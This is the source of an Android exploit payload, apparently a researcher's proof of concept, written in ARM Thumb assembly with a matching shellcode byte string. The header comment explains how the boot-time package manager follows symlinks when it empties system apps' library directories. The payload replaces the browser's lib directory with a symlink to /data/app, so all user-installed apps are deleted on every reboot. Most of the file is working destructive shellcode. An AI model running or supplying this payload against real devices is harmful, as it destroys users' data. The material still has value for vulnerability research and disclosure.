/*
* Android Arbitrary File Removal Payload
* by Dan Rosenberg (@djrbliss)
*
* Android differentiates between "system" applications and user-installed
* applications, where the former are OEM-shipped and installed in
/system/app
* rather than /data/app (this has nothing to do with the privileges
with which
* these applications run). On boot, the Android package manager does a
sanity
* check on system apps to ensure their native library directories, in
* /data/data/[app]/lib, are empty, and if not, empties them by unlinking
* everything inside. This check will happily follow symbolic links, so
if you
* can run code in the context of a system application (such as the
browser),
* you can replace its lib/ directory with a symlink to a target directory,
* which will be (non-recursively) emptied on every subsequent reboot
until the
* symlink is removed. Of course this will only remove files on filesystems
* mounted read-write (usually not /system).
*
* I expect this will be useful for APT attackers who have Webkit
exploits, are
* really bored, and want to play pranks on their victims. :p
*
* This ARM payload removes all user-installed applications on reboot,
freeing
* you from the shackles of your Twitter addiction. This example must
be run
* in the context of the Android browser.
*
* char payload[] = "\x04\xa0\x28\x27\x00\xdf\x0c\xa0\x02\xa1\x53\x27\x00"
* "\xdf\x01\x27\x00\xdf\xc0\x46\x2f\x64\x61\x74\x61\x2f"
* "\x64\x61\x74\x61\x2f\x63\x6f\x6d\x2e\x61\x6e\x64\x72"
* "\x6f\x69\x64\x2e\x62\x72\x6f\x77\x73\x65\x72\x2f\x6c"
* "\x69\x62\x00\x00\x2f\x64\x61\x74\x61\x2f\x61\x70\x70"
* "\x00\xc0\x46";
*/
.equ NR_exit, 1
.equ NR_rmdir, 40
.equ NR_symlink, 83
.thumb
.text
start:
.Lrmdir:
adr r0, .Llib
mov r7, #NR_rmdir
swi #0
.Lsymlink:
adr r0, .Lapps
adr r1, .Llib
mov r7, #NR_symlink
swi #0
.Lexit:
mov r7, #NR_exit
swi #0
.align
.Llib:
.asciz "/data/data/com.android.browser/lib"
.align
.Lapps:
.asciz "/data/app"
.end